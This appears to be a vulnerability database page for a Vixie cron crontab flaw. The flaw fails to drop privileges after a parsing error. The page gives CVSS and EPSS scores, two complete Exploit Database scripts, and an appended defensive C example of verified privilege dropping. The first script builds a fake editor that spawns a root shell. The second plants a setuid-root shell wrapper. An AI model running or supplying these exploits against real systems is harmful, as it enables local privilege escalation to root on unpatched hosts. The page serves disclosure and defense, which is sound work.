Metrics
Metrics | Score | Severity | CVSS Vector | Source
V2 | 7.2 | | AV:L/AC:L/Au:N/C:C/I:C/A:C | [email protected]
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0% and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile ranks CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of one CVE with that of other CVEs.
Exploit information
Exploit Database EDB-ID : 20822
Publication date : 2001-05-06 22h00 +00:00
Author : Sebastian Krahmer
EDB Verified : Yes
source: https://www.securityfocus.com/bid/2687/info
Vixie cron is an implementation of the popular UNIX program that runs user-specified programs at periodic scheduled times.
When a parsing error occurs after a modification operation, crontab will fail to drop privileges correctly for subsequent modification operations.
This vulnerability may be exploited to gain root privileges locally.
#!/bin/bash
clear
echo ".-----------------------------------------------------------."
echo "| Marchew.Hyperreal presents: vixie crontab exploit #728371 |"
echo "|===========================================================|"
echo "| Sebastian Krahmer <[email protected]> |"
echo "| Michal Zalewski <[email protected]> |"
echo "\`-----------------------------------------------------------'"
echo
test "$CRONBIN" = "" && CRONBIN=/usr/bin/crontab
echo ">>> Using binary: $CRONBIN"
echo -n ">>> Setuid check: "
if [ -u $CRONBIN ]; then
echo "PASSED"
else
echo "FAILED"
echo
exit 1
fi
echo -n ">>> Version check: "
QQ=`strings $CRONBIN | grep '43 vixie Exp'`
if [ "$QQ" = "" ]; then
echo "FAILED"
echo
exit 1
else
echo "PASSED"
fi
echo ">>> Building exploit..."
cat >edit0r.c <<_eof_
#include <stdio.h>
int main(int argc,char* argv[]) {
sleep(1);
if (geteuid()) {
FILE* x=fopen(argv[1],"w");
fprintf(x,"blah blah blah\n");
fclose(x);
} else {
dup2(1,0);
dup2(1,2);
printf("\n>>> Entering rootshell, babe...\n");
system("touch $HOME/.xploited");
system("bash");
}
}
_eof_
gcc edit0r.c -o edit0r &>/dev/null
rm -f edit0r.c
if [ ! -f edit0r ]; then
echo ">>> Cannot compile exploit."
echo
exit 1
fi
rm -f ~/.xploited
echo ">>> Performing attack..."
( echo "y"; echo "n" ) | VISUAL=$PWD/edit0r $CRONBIN -e 2>/dev/null
rm -f edit0r
if [ -f ~/.xploited ]; then
echo
echo ">>> Thank you."
rm -f ~/.xploited
echo
exit 0
else
echo
echo ">>> Apparently I am not able to exploit it, sorry..."
echo
exit 1
fi
Exploit Database EDB-ID : 20823
Publication date : 2001-07-04 22h00 +00:00
Author : cairnsc
EDB Verified : Yes
source: https://www.securityfocus.com/bid/2687/info
#!/bin/sh
#
# cronboom - simple proof-of-concept exploit for vixie cron version 3.1pl1
#
# synopsis:
# the crontab file maintenance program (crontab) fails to drop privileges
# before invoking the editor under certain circumstances.
#
# description:
# a serialization error exists in some versions of the file maintenance
# program, crontab. the vulnerability was introduced in versions which
# were patched for a separate vulnerability in fall of 2000 (see Bugtraq
# ID #1960).
#
# when a parsing error occurs after a modification operation, crontab will
# fail to drop privileges correctly for subsequent modification operations.
# because the program is installed setuid root, it may be possible for a
# local user to gain root privileges.
#
# affected versions:
# cron_3.0pl1-57.2 distributed with Debian Linux 2.2.
#
# note that copies of the program with the patch mentioned above are likely
# to also be vulnerable.
#
# references:
# https://www.securityfocus.com/bid/2687
#
# 05/07/01 [email protected]
CRONTAB=/usr/bin/crontab
if ! test -x $CRONTAB; then
echo "** unable to locate crontab executable, exiting"
exit 1
fi
cat > vcsh.c << EOF
#include <unistd.h>
int main() {
setuid(0);
setgid(0);
execl("/bin/sh", "sh", NULL);
}
EOF
echo "** compiling shell wrapper as $PWD/vcsh"
cc -o $PWD/vcsh $PWD/vcsh.c
if ! test -x $PWD/vcsh; then
echo "** compilation failed, exiting"
exit 1
fi
echo "** creating simple exploit script as $PWD/vcex.sh"
cat > vcex.sh << EOF
#!/bin/sh
sleep 1 && echo "foo" >> \$1
if test -f $PWD/vcboom; then
chown root.root $PWD/vcsh
chmod 4755 $PWD/vcsh
rm $PWD/vcboom
else
touch $PWD/vcboom
fi
EOF
chmod 0755 $PWD/vcex.sh
echo "** running $CRONTAB -e"
echo "**"
echo "** enter 'yes' at the first prompt, then enter 'no' at the second"
echo
(EDITOR=$PWD/vcex.sh $CRONTAB -e)
echo
echo "** done, the shell wrapper should be suid root"
exit 0
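The description above says crontab drops privileges for the first modification but not for the one that follows a parsing error. The C code below is an added example, not Vixie cron's code or its patch: it performs and verifies the drop in the child before every editor launch and fails closed. `drop_privileges` and `run_editor_dropped` are hypothetical names, and `/bin/sh /dev/null` stands in for the editor.

```c
/* Added illustration; not Vixie cron source. Function names are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Permanently drop to uid/gid and verify. Returns 0 on success, -1 otherwise.
 * In a setuid-root binary only the effective and saved IDs are elevated, so
 * the supplementary groups already belong to the invoking user. */
int drop_privileges(uid_t uid, gid_t gid)
{
    uid_t old_euid = geteuid();
    gid_t old_egid = getegid();

    if (setgid(gid) != 0) return -1;   /* group first, while still privileged */
    if (setuid(uid) != 0) return -1;   /* as root: sets real, effective, saved */

    if (getuid() != uid || geteuid() != uid) return -1;
    if (getgid() != gid || getegid() != gid) return -1;
    /* The old identity must be unreachable now. */
    if (old_euid != uid && seteuid(old_euid) == 0) return -1;
    if (old_egid != gid && setegid(old_egid) == 0) return -1;
    return 0;
}

/* Run `editor path` as uid/gid. The drop happens in the child on every call,
 * so a retry after a parse error cannot skip it or reuse earlier state. */
int run_editor_dropped(const char *editor, const char *path, uid_t uid, gid_t gid)
{
    int status;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (drop_privileges(uid, gid) != 0) _exit(126);  /* fail closed */
        execl(editor, editor, path, (char *)NULL);
        _exit(127);                                      /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Two passes, as when crontab re-opens the editor after a rejected edit. */
    for (int pass = 1; pass <= 2; pass++) {
        int rc = run_editor_dropped("/bin/sh", "/dev/null", getuid(), getgid());
        printf("pass %d: editor exit status %d\n", pass, rc);
    }
    return 0;
}
```

Exit status 126 from the child means the drop could not be verified and the editor was never started.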
Products Mentioned
Configuration 0
Paul_vixie>>Vixie_cron >> Version To (including) 3.0.1